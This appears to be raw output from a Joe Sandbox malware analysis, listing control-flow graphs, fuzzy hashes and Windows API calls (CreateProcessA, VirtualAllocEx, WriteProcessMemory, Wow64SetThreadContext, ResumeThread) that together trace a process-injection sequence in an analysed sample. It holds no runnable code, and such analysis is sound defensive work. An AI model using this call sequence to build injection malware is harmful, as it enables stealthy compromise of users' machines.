                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 4G$5im8$<$@
                                                                                                                                                                                        • API String ID: 0-2188762918
                                                                                                                                                                                        • Opcode ID: d2b87ae558167bb0d132e5469d2d0a286ab82bfad5d7d963727a409f20e2df68
                                                                                                                                                                                        • Instruction ID: e8ce85aac5313da5e178077966f69930803b4c3678b538b8b5ac20ff93f2e27f
                                                                                                                                                                                        • Opcode Fuzzy Hash: d2b87ae558167bb0d132e5469d2d0a286ab82bfad5d7d963727a409f20e2df68
                                                                                                                                                                                        • Instruction Fuzzy Hash: 20628E74D01219CFDB64DFA9CA80A9EFBF2BF48315F15E5A9D808AB211D730A985CF50
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_e50000_x.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 39bd973cf413164e9aec323e714cde55589453ea15a533384e5046c34d1c8b5a
                                                                                                                                                                                        • Instruction ID: e7cfb0e62b162fcb1099560f2b62fa036871b0ce2da337aa4875ac78edbb92ff
                                                                                                                                                                                        • Opcode Fuzzy Hash: 39bd973cf413164e9aec323e714cde55589453ea15a533384e5046c34d1c8b5a
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F428E74E01218CFDB24CFA9C984B9EBBB2BF48301F1495A9E909B7355D731AA85CF50
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_e50000_x.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: be6783751986cb31c60afda9c7ea72794f70ad685c427acc3cbf84aac8f06cf9
                                                                                                                                                                                        • Instruction ID: 8c7acaea0c218ecbd1ccaeaecc31812224d1e29c2bb78ff4474fe674fdb63b84
                                                                                                                                                                                        • Opcode Fuzzy Hash: be6783751986cb31c60afda9c7ea72794f70ad685c427acc3cbf84aac8f06cf9
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5661A375E01618CFDB18CFAAC984B9EBBB2FF88301F1485A9D809B7265D7319985CF50

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 679 e5580c-e56bec ReadProcessMemory 682 e56bf5-e56c3f 679->682 683 e56bee-e56bf4 679->683 683->682
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • ReadProcessMemory.KERNELBASE(00000004,?,00E56AFB,?,?), ref: 00E56BDC
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_e50000_x.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                                                                                        • String ID: H_
                                                                                                                                                                                        • API String ID: 1726664587-1241256378
                                                                                                                                                                                        • Opcode ID: f01b131daee9f2b5e6a71b685fccedcc754724c9993ef9c2a9c97c336052a7ef
                                                                                                                                                                                        • Instruction ID: 2b56f0544b6c4bd60d76ebf8681329b40512b9368720c0bc9264551f2a713c69
                                                                                                                                                                                        • Opcode Fuzzy Hash: f01b131daee9f2b5e6a71b685fccedcc754724c9993ef9c2a9c97c336052a7ef
                                                                                                                                                                                        • Instruction Fuzzy Hash: C24198B5D002589FCB10CFA9D984ADEFBF1FB59310F20A42AE818B7210D375A945CF64

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 687 e558d4-e569fc 690 e56a13-e56a59 Wow64SetThreadContext 687->690 691 e569fe-e56a10 687->691 692 e56a62-e56aa6 690->692 693 e56a5b-e56a61 690->693 691->690 693->692
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 00E56A49
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_e50000_x.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                                                                        • String ID: l^
                                                                                                                                                                                        • API String ID: 983334009-3305242395
                                                                                                                                                                                        • Opcode ID: 30bdd669e9280fcc6560b20f2b7c5f4a6bf9576d647cbad0f20b65c29c3967a3
                                                                                                                                                                                        • Instruction ID: 60b8a87feff67f346b8df6a9547ee76c5133b75f274973347084795742f60d9f
                                                                                                                                                                                        • Opcode Fuzzy Hash: 30bdd669e9280fcc6560b20f2b7c5f4a6bf9576d647cbad0f20b65c29c3967a3
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3041A9B4D002589FCB10CFAAD984ADEFBF0BB49310F24942AE818B7311D378A949CF54

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 697 e5575c-e55770 700 e557d5-e557dc 697->700 701 e55772-e557b7 697->701 702 e5583c-e5750f 700->702 703 e557de-e569fc 700->703 710 e57526-e57585 WriteProcessMemory 702->710 711 e57511-e57523 702->711 716 e56a13-e56a59 Wow64SetThreadContext 703->716 717 e569fe-e56a10 703->717 714 e57587-e5758d 710->714 715 e5758e-e575d8 710->715 711->710 714->715 720 e56a62-e56aa6 716->720 721 e56a5b-e56a61 716->721 717->716 721->720
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 00E56A49
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_e50000_x.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                                                                        • Opcode ID: 40ba7a0279429429abc90f15197cabb80ced890d297ce5596b0a01dcdc59f678
                                                                                                                                                                                        • Instruction ID: 400607969d0aa8a8c1d47eef601203c6fb9b85c78411a8f15a89bfd9f7715e34
                                                                                                                                                                                        • Opcode Fuzzy Hash: 40ba7a0279429429abc90f15197cabb80ced890d297ce5596b0a01dcdc59f678
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2BA1FEB5C052989FCB01CFA9D880ADDBFF0AF4A310F24945AE854BB251D334A949CF64

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 797 e557cc-e56423 800 e56485-e564b0 797->800 801 e56425-e56455 797->801 804 e56512-e5656b 800->804 805 e564b2-e564e2 800->805 801->800 808 e56457-e5645c 801->808 812 e5656d-e5659a 804->812 813 e565ca-e566b6 CreateProcessA 804->813 805->804 817 e564e4-e564e9 805->817 810 e5647f-e56482 808->810 811 e5645e-e56468 808->811 810->800 815 e5646c-e5647b 811->815 816 e5646a 811->816 812->813 827 e5659c-e565a1 812->827 836 e566bf-e56799 813->836 837 e566b8-e566be 813->837 815->815 818 e5647d 815->818 816->815 821 e5650c-e5650f 817->821 822 e564eb-e564f5 817->822 818->810 821->804 824 e564f7 822->824 825 e564f9-e56508 822->825 824->825 825->825 828 e5650a 825->828 829 e565c4-e565c7 827->829 830 e565a3-e565ad 827->830 828->821 829->813 832 e565b1-e565c0 830->832 833 e565af 830->833 832->832 835 e565c2 832->835 833->832 835->829 848 e567a9-e567ad 836->848 849 e5679b-e5679f 836->849 837->836 851 e567bd-e567c1 848->851 852 e567af-e567b3 848->852 849->848 850 e567a1 849->850 850->848 854 e567d1-e567d5 851->854 855 e567c3-e567c7 851->855 852->851 853 e567b5 852->853 853->851 856 e567d7-e56800 854->856 857 e5680b-e56816 854->857 855->854 858 e567c9 855->858 856->857 862 e56817 857->862 858->854 862->862
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateProcessA.KERNELBASE(?,?,03C9358C,03C93590,00E56316,?,?,?,?,?), ref: 00E566A3
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_e50000_x.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CreateProcess
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                                                                        • Opcode ID: 2128a656e5cac4ea67fb4b58a301158a17f7443f265d83bb2d290a85c094eecc
                                                                                                                                                                                        • Instruction ID: 27b382eca2bd8e8c96f138a5713ee162ada436102b1de154a270e3e5012d51e5
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2128a656e5cac4ea67fb4b58a301158a17f7443f265d83bb2d290a85c094eecc
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6CD12770D002199FDF24CFA8C881BEDBBB1FB49304F1095A9D819B7290DB749A89CF90

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 863 e56374-e56423 865 e56485-e564b0 863->865 866 e56425-e56455 863->866 869 e56512-e5656b 865->869 870 e564b2-e564e2 865->870 866->865 873 e56457-e5645c 866->873 877 e5656d-e5659a 869->877 878 e565ca-e566b6 CreateProcessA 869->878 870->869 882 e564e4-e564e9 870->882 875 e5647f-e56482 873->875 876 e5645e-e56468 873->876 875->865 880 e5646c-e5647b 876->880 881 e5646a 876->881 877->878 892 e5659c-e565a1 877->892 901 e566bf-e56799 878->901 902 e566b8-e566be 878->902 880->880 883 e5647d 880->883 881->880 886 e5650c-e5650f 882->886 887 e564eb-e564f5 882->887 883->875 886->869 889 e564f7 887->889 890 e564f9-e56508 887->890 889->890 890->890 893 e5650a 890->893 894 e565c4-e565c7 892->894 895 e565a3-e565ad 892->895 893->886 894->878 897 e565b1-e565c0 895->897 898 e565af 895->898 897->897 900 e565c2 897->900 898->897 900->894 913 e567a9-e567ad 901->913 914 e5679b-e5679f 901->914 902->901 916 e567bd-e567c1 913->916 917 e567af-e567b3 913->917 914->913 915 e567a1 914->915 915->913 919 e567d1-e567d5 916->919 920 e567c3-e567c7 916->920 917->916 918 e567b5 917->918 918->916 921 e567d7-e56800 919->921 922 e5680b-e56816 919->922 920->919 923 e567c9 920->923 921->922 927 e56817 922->927 923->919 927->927
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateProcessA.KERNELBASE(?,?,03C9358C,03C93590,00E56316,?,?,?,?,?), ref: 00E566A3
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_e50000_x.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CreateProcess
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                                                                        • Opcode ID: afeb549e26ae07b2ab31eb905bc8e8c1c5fa77028ec31f428ab5e86d7b3dd384
                                                                                                                                                                                        • Instruction ID: 82cd39922fdba96dccfdf23d98e4923979a9248468e45e2b30b8ad4ba8aed0b3
                                                                                                                                                                                        • Opcode Fuzzy Hash: afeb549e26ae07b2ab31eb905bc8e8c1c5fa77028ec31f428ab5e86d7b3dd384
                                                                                                                                                                                        • Instruction Fuzzy Hash: ECD11770D002199FDF24CFA8C881BEDBBB1FB49305F1095A9D919B7290DB749A89CF94

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 928 e55830-e5750f 933 e57526-e57585 WriteProcessMemory 928->933 934 e57511-e57523 928->934 935 e57587-e5758d 933->935 936 e5758e-e575d8 933->936 934->933 935->936
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 00E57575
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_e50000_x.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                                                                        • Opcode ID: be0822cbd925209f94298c7b229a278e744ddfeb87053e116278015095622b97
                                                                                                                                                                                        • Instruction ID: e94f9cfd8ad92f11cbca189ce9bb7b707b4245ae505ee295869ae4e6ecc17886
                                                                                                                                                                                        • Opcode Fuzzy Hash: be0822cbd925209f94298c7b229a278e744ddfeb87053e116278015095622b97
                                                                                                                                                                                        • Instruction Fuzzy Hash: 544189B5D042589FCB00CFA9D984AEEFBF1BF49314F24A42AE818BB250D375A945CF54

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 940 e5583c-e5750f 943 e57526-e57585 WriteProcessMemory 940->943 944 e57511-e57523 940->944 945 e57587-e5758d 943->945 946 e5758e-e575d8 943->946 944->943 945->946
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 00E57575
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_e50000_x.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                                                                        • Opcode ID: 589f1fb428807a9b4da0887dee162de089ae00c603d052e786ea8c5096be0a4b
                                                                                                                                                                                        • Instruction ID: 54eb1c796f2075d3d05f41f1aab9a3d80388197a0ff5df284cc79e38dc847dad
                                                                                                                                                                                        • Opcode Fuzzy Hash: 589f1fb428807a9b4da0887dee162de089ae00c603d052e786ea8c5096be0a4b
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E4199B5D042589FCF00CFA9D984AEEFBF1BB49310F24A42AE818BB210D375A944CF54

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 950 e57499-e5750f 952 e57526-e57585 WriteProcessMemory 950->952 953 e57511-e57523 950->953 954 e57587-e5758d 952->954 955 e5758e-e575d8 952->955 953->952 954->955
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 00E57575
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_e50000_x.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                                                                        • Opcode ID: a088bc71a96ebdb34e4ceffaf6ab63a1d85a31068b2759a883226d832da7e620
                                                                                                                                                                                        • Instruction ID: 7321c296e6efd6e280f1f14885a7794dd59821110867648fbcb13ba2186c7cb2
                                                                                                                                                                                        • Opcode Fuzzy Hash: a088bc71a96ebdb34e4ceffaf6ab63a1d85a31068b2759a883226d832da7e620
                                                                                                                                                                                        • Instruction Fuzzy Hash: 764199B5D002589FCB00CFA9D984AEEFBF1BF49310F24942AE818BB210D375A955CF54

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 959 e56d28-e56d2d 960 e56d0f-e56d1d 959->960 961 e56d2f-e56d70 959->961 963 e56d78-e56dec VirtualAllocEx 961->963 964 e56df5-e56e37 963->964 965 e56dee-e56df4 963->965 965->964
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00E56DDC
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_e50000_x.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                        • Opcode ID: 33147c7f257d31494cd9b738f82e16da3a3432f8260bedd32d3011511a17be22
                                                                                                                                                                                        • Instruction ID: 8689ccc02b07869e884259d6a25030f8dad157685e19f8278db2ad184d19fd6d
                                                                                                                                                                                        • Opcode Fuzzy Hash: 33147c7f257d31494cd9b738f82e16da3a3432f8260bedd32d3011511a17be22
                                                                                                                                                                                        • Instruction Fuzzy Hash: E34189B9D052589FCF10CFA9D984ADEFBB1BB59310F24A41AE818B7310D375A905CF54

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 969 e55824-e56dec VirtualAllocEx 972 e56df5-e56e37 969->972 973 e56dee-e56df4 969->973 973->972
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00E56DDC
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_e50000_x.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                        • Opcode ID: 5bda928ff568e669e7e001f4d081627d3e82b71c905d1a351e93d9f5daf14f86
                                                                                                                                                                                        • Instruction ID: 815c811775cb9bd1d7d51dc7627e0499392c54c676633d5b41acf5f016010cd3
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5bda928ff568e669e7e001f4d081627d3e82b71c905d1a351e93d9f5daf14f86
                                                                                                                                                                                        • Instruction Fuzzy Hash: 654186B9D002589FCF10CFA9D984A9EFBF1AB59310F20A42AE818B7310D375A905CF64

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 977 e557d8-e569fc 982 e56a13-e56a59 Wow64SetThreadContext 977->982 983 e569fe-e56a10 977->983 984 e56a62-e56aa6 982->984 985 e56a5b-e56a61 982->985 983->982 985->984
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 00E56A49
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_e50000_x.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                                                                        • Opcode ID: 83ab9ecc218eed4c2a146704d9191712720e91e02c15c6624e72bd3803124186
                                                                                                                                                                                        • Instruction ID: 3cb084845810fcec6c7d072808d65456d68927cca7a260e0c1c809128b42dd14
                                                                                                                                                                                        • Opcode Fuzzy Hash: 83ab9ecc218eed4c2a146704d9191712720e91e02c15c6624e72bd3803124186
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1341BBB5D002589FCB10CFAAD884ADEFBF1BB49314F20942AE818B7251D378A949CF54

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 989 e557e4-e569fc 992 e56a13-e56a59 Wow64SetThreadContext 989->992 993 e569fe-e56a10 989->993 994 e56a62-e56aa6 992->994 995 e56a5b-e56a61 992->995 993->992 995->994
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 00E56A49
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_e50000_x.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                                                                        • Opcode ID: 3d420a03373de83dbcec03d2ea7a85bec91281e3be168cd6dc7e5b901f79fea1
                                                                                                                                                                                        • Instruction ID: 597e6285fa8a9f3e1fef9108b2247f4423223ad7c24502755cf2d00e32131ae2
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d420a03373de83dbcec03d2ea7a85bec91281e3be168cd6dc7e5b901f79fea1
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A41A9B4D002589FCB10CFAAD984ADEFBF0BB49310F20942AE818B7351D378A949CF54

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 999 e56990-e569fc 1002 e56a13-e56a59 Wow64SetThreadContext 999->1002 1003 e569fe-e56a10 999->1003 1004 e56a62-e56aa6 1002->1004 1005 e56a5b-e56a61 1002->1005 1003->1002 1005->1004
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 00E56A49
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_e50000_x.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                                                                        • Opcode ID: a7467fe6d7ce190d63e4622a0ce7fba613411472d550f207d856c334f5c90f12
                                                                                                                                                                                        • Instruction ID: 42046ced5f1604c29e003dc186a124b50b2327273b2d87da7c6c27c53fc635b9
                                                                                                                                                                                        • Opcode Fuzzy Hash: a7467fe6d7ce190d63e4622a0ce7fba613411472d550f207d856c334f5c90f12
                                                                                                                                                                                        • Instruction Fuzzy Hash: A141A9B4D002589FCB10CFAAD984ADEFBF1BB49314F20942AE818B7211D378A949CF54
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00E51C7F
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_e50000_x.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                                                        • Opcode ID: 2bc176af1f9bfcb0a1d296a6f54fbfb93670711fa49ded07b24b17b0dd9f992f
                                                                                                                                                                                        • Instruction ID: 0e5f1e29e5858c8a49da98cf367c1ad29342d5c8f9f64c1e564e8532e6d1c766
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2bc176af1f9bfcb0a1d296a6f54fbfb93670711fa49ded07b24b17b0dd9f992f
                                                                                                                                                                                        • Instruction Fuzzy Hash: C831B8B9D002589FCB14CFA9D980ADEFBF1BB19310F24A06AE818B7310C375A944CF64
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • ResumeThread.KERNELBASE(00000000), ref: 00E578BD
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_e50000_x.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                                                        • Opcode ID: cd32ae97108b51a8d15fa0e30b1e30b7e4c94dcdc205a3280bc073f4d2569ca0
                                                                                                                                                                                        • Instruction ID: 0c1844e78c2049d78141bb87a51ab6de544459171d45c2bcf27630ce26da373e
                                                                                                                                                                                        • Opcode Fuzzy Hash: cd32ae97108b51a8d15fa0e30b1e30b7e4c94dcdc205a3280bc073f4d2569ca0
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7231CBB4D052189FCB14CFA9E484A9EFBF4FB48310F20946AE818B7310D375A904CFA4

                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                        Execution Coverage:14.8%
                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                        Signature Coverage:14.3%
                                                                                                                                                                                        Total number of Nodes:28
                                                                                                                                                                                        Total number of Limit Nodes:3
                                                                                                                                                                                        execution_graph 8813 2aa46d8 8814 2aa46e4 8813->8814 8817 2aa48c9 8814->8817 8818 2aa48e4 8817->8818 8822 2aa4ef8 8818->8822 8827 2aa4f08 8818->8827 8819 2aa4713 8823 2aa4f08 8822->8823 8824 2aa4ff6 8823->8824 8832 2aac168 8823->8832 8836 2aac76c 8823->8836 8824->8819 8828 2aa4f2a 8827->8828 8829 2aa4ff6 8828->8829 8830 2aac168 LdrInitializeThunk 8828->8830 8831 2aac76c 2 API calls 8828->8831 8829->8819 8830->8829 8831->8829 8833 2aac17a 8832->8833 8835 2aac17f 8832->8835 8833->8824 8834 2aac8a9 LdrInitializeThunk 8834->8833 8835->8833 8835->8834 8841 2aac623 8836->8841 8838 2aac764 LdrInitializeThunk 8839 2aac8c1 8838->8839 8839->8824 8840 2aac168 LdrInitializeThunk 8840->8841 8841->8838 8841->8840 8842 2aaca58 8843 2aaca5f 8842->8843 8845 2aaca65 8842->8845 8844 2aac168 LdrInitializeThunk 8843->8844 8843->8845 8847 2aacde6 8843->8847 8844->8847 8846 2aac168 LdrInitializeThunk 8846->8847 8847->8845 8847->8846

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
